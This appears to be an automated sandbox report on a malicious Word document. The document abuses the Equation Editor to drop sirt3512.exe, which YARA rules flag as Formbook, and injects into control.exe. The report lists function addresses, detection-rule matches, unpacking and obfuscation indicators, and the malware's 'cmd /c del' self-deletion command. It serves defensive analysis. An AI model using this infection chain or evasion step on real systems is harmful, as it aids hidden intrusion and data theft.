Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 4_2_004647E1 4_2_004647E1
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 4_2_004643F7 4_2_004643F7
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 4_2_004653F0 4_2_004653F0
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 4_2_005792E0 4_2_005792E0
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 4_2_00576280 4_2_00576280
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 4_2_0057D348 4_2_0057D348
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 4_2_00578B50 4_2_00578B50
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 4_2_0057AC38 4_2_0057AC38
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 4_2_00579D31 4_2_00579D31
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 4_2_00577F48 4_2_00577F48
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 4_2_00570048 4_2_00570048
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 4_2_00570006 4_2_00570006
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 4_2_0057D178 4_2_0057D178
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 4_2_0057D168 4_2_0057D168
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 4_2_00576272 4_2_00576272
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 4_2_0057AB40 4_2_0057AB40
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 4_2_0057BB60 4_2_0057BB60
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 4_2_0057CD50 4_2_0057CD50
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 4_2_0057CF38 4_2_0057CF38
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 5_2_00401030 5_2_00401030
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 5_2_0041E1CF 5_2_0041E1CF
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 5_2_0041D23B 5_2_0041D23B
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 5_2_00402D87 5_2_00402D87
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 5_2_00402D90 5_2_00402D90
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 5_2_00409E40 5_2_00409E40
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 5_2_0041D6CF 5_2_0041D6CF
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 5_2_00402FB0 5_2_00402FB0
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 5_2_0041BFB6 5_2_0041BFB6
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 5_2_0093E0C6 5_2_0093E0C6
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 5_2_0096D005 5_2_0096D005
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 5_2_0095905A 5_2_0095905A
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 5_2_00943040 5_2_00943040
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 5_2_0093E2E9 5_2_0093E2E9
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 5_2_009E1238 5_2_009E1238
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 5_2_009663DB 5_2_009663DB
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 5_2_0093F3CF 5_2_0093F3CF
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 5_2_00942305 5_2_00942305
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 5_2_00947353 5_2_00947353
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 5_2_0098A37B 5_2_0098A37B
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 5_2_00975485 5_2_00975485
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 5_2_00951489 5_2_00951489
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 5_2_0097D47D 5_2_0097D47D
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 5_2_0095C5F0 5_2_0095C5F0
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 5_2_0094351F 5_2_0094351F
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 5_2_00944680 5_2_00944680
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 5_2_0094E6C1 5_2_0094E6C1
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 5_2_009E2622 5_2_009E2622
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 5_2_009C579A 5_2_009C579A
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 5_2_0094C7BC 5_2_0094C7BC
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 5_2_009757C3 5_2_009757C3
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 5_2_009DF8EE 5_2_009DF8EE
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 5_2_0094C85C 5_2_0094C85C
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 5_2_0096286D 5_2_0096286D
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 5_2_009E098E 5_2_009E098E
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 5_2_009429B2 5_2_009429B2
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 5_2_009569FE 5_2_009569FE
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 5_2_009C5955 5_2_009C5955
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 5_2_009F3A83 5_2_009F3A83
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 5_2_009ECBA4 5_2_009ECBA4
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 5_2_0093FBD7 5_2_0093FBD7
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 5_2_009CDBDA 5_2_009CDBDA
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 5_2_00967B00 5_2_00967B00
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 5_2_009DFDDD 5_2_009DFDDD
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 5_2_00970D3B 5_2_00970D3B
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 5_2_0094CD5B 5_2_0094CD5B
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 5_2_00972E2F 5_2_00972E2F
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 5_2_0095EE4C 5_2_0095EE4C
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 5_2_00950F3F 5_2_00950F3F
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 5_2_0096DF7C 5_2_0096DF7C
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_02031238 7_2_02031238
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_01F8E0C6 7_2_01F8E0C6
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_01FA905A 7_2_01FA905A
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_01F93040 7_2_01F93040
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_020363BF 7_2_020363BF
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_01FBD005 7_2_01FBD005
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_01FB63DB 7_2_01FB63DB
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_01F8F3CF 7_2_01F8F3CF
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_01FDA37B 7_2_01FDA37B
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_01F97353 7_2_01F97353
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_01F92305 7_2_01F92305
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_01F8E2E9 7_2_01F8E2E9
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_01FAC5F0 7_2_01FAC5F0
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_02032622 7_2_02032622
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_01FD6540 7_2_01FD6540
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_01F9351F 7_2_01F9351F
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_01FA1489 7_2_01FA1489
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_01FC5485 7_2_01FC5485
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_01FCD47D 7_2_01FCD47D
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_0201579A 7_2_0201579A
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_01FC57C3 7_2_01FC57C3
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_0201443E 7_2_0201443E
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_01F9C7BC 7_2_01F9C7BC
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_01F9E6C1 7_2_01F9E6C1
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_01F94680 7_2_01F94680
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_01FDA634 7_2_01FDA634
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_01FA69FE 7_2_01FA69FE
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_01F929B2 7_2_01F929B2
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_02043A83 7_2_02043A83
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_01FB286D 7_2_01FB286D
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_01F9C85C 7_2_01F9C85C
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_0203CBA4 7_2_0203CBA4
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_0201DBDA 7_2_0201DBDA
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_01F8FBD7 7_2_01F8FBD7
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_0202F8EE 7_2_0202F8EE
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_01FB7B00 7_2_01FB7B00
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_0201394B 7_2_0201394B
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_02015955 7_2_02015955
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_0203098E 7_2_0203098E
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_01F9CD5B 7_2_01F9CD5B
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_01FC0D3B 7_2_01FC0D3B
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_0202CFB1 7_2_0202CFB1
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_02002FDC 7_2_02002FDC
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_01FBDF7C 7_2_01FBDF7C
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_01FA0F3F 7_2_01FA0F3F
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_01FAEE4C 7_2_01FAEE4C
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_01FC2E2F 7_2_01FC2E2F
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_0202FDDD 7_2_0202FDDD
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_000FE1CF 7_2_000FE1CF
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_000FD23B 7_2_000FD23B
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_000E2D87 7_2_000E2D87
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_000E2D90 7_2_000E2D90
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_000E9E40 7_2_000E9E40
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_000FBFB6 7_2_000FBFB6
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_000E2FB0 7_2_000E2FB0
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_01E49882 7_2_01E49882
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_01E48152 7_2_01E48152
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_01E41069 7_2_01E41069
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_01E41072 7_2_01E41072
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_01E45B22 7_2_01E45B22
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_01E45B1F 7_2_01E45B1F
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_01E4AA52 7_2_01E4AA52
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_01E4DA0C 7_2_01E4DA0C
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_01E42CE9 7_2_01E42CE9
Source: C:\Windows\SysWOW64\control.exe Code function: 7_2_01E42CF2 7_2_01E42CF2
Found potential string decryption / allocating functions
Source: C:\Windows\SysWOW64\control.exe Code function: String function: 01FD373B appears 244 times
Source: C:\Windows\SysWOW64\control.exe Code function: String function: 01F8DF5C appears 119 times
Source: C:\Windows\SysWOW64\control.exe Code function: String function: 01FD3F92 appears 132 times
Source: C:\Windows\SysWOW64\control.exe Code function: String function: 01FFF970 appears 84 times
Source: C:\Windows\SysWOW64\control.exe Code function: String function: 01F8E2A8 appears 38 times
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: String function: 0093DF5C appears 110 times
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: String function: 0098373B appears 238 times
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: String function: 009AF970 appears 81 times
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: String function: 00983F92 appears 108 times
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: String function: 0093E2A8 appears 38 times
PE file contains strange resources
Source: sirtx[1].exe.2.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: sirt3512.exe.2.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Yara signature match
Source: 00000007.00000002.2353252437.00000000001D0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.2353252437.00000000001D0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.2353301076.0000000000290000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.2353301076.0000000000290000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.2132134881.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.2132134881.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.2132063520.0000000000180000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.2132063520.0000000000180000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.2094658238.0000000003F49000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.2094658238.0000000003F49000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000000.2092914206.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000000.2092914206.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.2132009638.00000000000F0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.2132009638.00000000000F0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.2353128733.00000000000E0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.2353128733.00000000000E0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.2.sirt3512.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.2.sirt3512.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.0.sirt3512.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.0.sirt3512.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.0.sirt3512.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.0.sirt3512.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.2.sirt3512.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.2.sirt3512.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 4.2.sirt3512.exe.3f494f0.5.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 4.2.sirt3512.exe.3f494f0.5.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: sirtx[1].exe.2.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: sirt3512.exe.2.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: explorer.exe, 00000006.00000000.2102624718.0000000003C40000.00000002.00000001.sdmp Binary or memory string: .VBPud<_
Source: classification engine Classification label: mal100.troj.expl.evad.winDOC@9/8@3/3
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\Desktop\~$QUIRY-PO3010773..EPR55804.doc Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Temp\CVRD01A.tmp Jump to behavior
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: sirt3512.exe, 00000004.00000002.2094353245.0000000002741000.00000004.00000001.sdmp Binary or memory string: Select * from Clientes WHERE id=@id;;
Source: sirt3512.exe, 00000004.00000002.2094353245.0000000002741000.00000004.00000001.sdmp Binary or memory string: Select * from Aluguel Erro ao listar Banco sql-Aluguel.INSERT INTO Aluguel VALUES(@clienteID, @data);
Source: sirt3512.exe, 00000004.00000002.2094353245.0000000002741000.00000004.00000001.sdmp Binary or memory string: Select * from SecurityLogonType WHERE id=@id;
Source: sirt3512.exe, 00000004.00000002.2094353245.0000000002741000.00000004.00000001.sdmp Binary or memory string: Select * from SecurityLogonType WHERE modelo=@modelo;
Source: sirt3512.exe, 00000004.00000002.2094353245.0000000002741000.00000004.00000001.sdmp Binary or memory string: INSERT INTO Itens_Aluguel VALUES(@aluguelID, @aviaoID, @validade);
Source: sirt3512.exe, 00000004.00000002.2094353245.0000000002741000.00000004.00000001.sdmp Binary or memory string: Insert into Clientes values (@nome, @cpf, @rg, @cidade, @endereco, @uf, @telefone);
Source: sirt3512.exe, 00000004.00000002.2094353245.0000000002741000.00000004.00000001.sdmp Binary or memory string: INSERT INTO Aluguel VALUES(@clienteID, @data);
Source: sirt3512.exe, 00000004.00000002.2094353245.0000000002741000.00000004.00000001.sdmp Binary or memory string: INSERT INTO SecurityLogonType VALUES(@modelo, @fabricante, @ano, @cor);
Source: sirt3512.exe, 00000004.00000002.2094353245.0000000002741000.00000004.00000001.sdmp Binary or memory string: Select * from SecurityLogonType*Erro ao listar Banco sql-SecurityLogonType,Select * from SecurityLogonType WHERE id=@id;Select * from SecurityLogonType WHERE (modelo LIKE @modelo)
Source: INQUIRY-PO3010773..EPR55804.doc ReversingLabs: Detection: 23%
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\user\AppData\Roaming\sirt3512.exe C:\Users\user\AppData\Roaming\sirt3512.exe
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Process created: C:\Users\user\AppData\Roaming\sirt3512.exe C:\Users\user\AppData\Roaming\sirt3512.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\control.exe C:\Windows\SysWOW64\control.exe
Source: C:\Windows\SysWOW64\control.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Roaming\sirt3512.exe'
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\user\AppData\Roaming\sirt3512.exe C:\Users\user\AppData\Roaming\sirt3512.exe Jump to behavior
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Process created: C:\Users\user\AppData\Roaming\sirt3512.exe C:\Users\user\AppData\Roaming\sirt3512.exe Jump to behavior
Source: C:\Windows\SysWOW64\control.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Roaming\sirt3512.exe' Jump to behavior
Source: C:\Windows\explorer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C90250F3-4D7D-4991-9B69-A5C5BC1C2AE6}\InProcServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\user\AppData\Roaming\sirt3512.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: Binary string: control.pdb source: sirt3512.exe, 00000005.00000002.2132218595.0000000000839000.00000004.00000020.sdmp
Source: Binary string: wntdll.pdb source: sirt3512.exe, control.exe

Data Obfuscation:

barindex
Detected unpacking (changes PE section rights)
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Unpacked PE file: 4.2.sirt3512.exe.1220000.3.unpack .text:ER;.rsrc:R;.reloc:R; vs Unknown_Section0:ER;Unknown_Section1:R;Unknown_Section2:R;
Detected unpacking (overwrites its own PE header)
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Unpacked PE file: 4.2.sirt3512.exe.1220000.3.unpack
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 4_2_01225097 push ss; retf 4_2_012250A0
Source: C:\Users\user\AppData\Roaming\sirt3512.exe Code function: 4_2_01224AEA push ebx; retf 4_2_01224B11
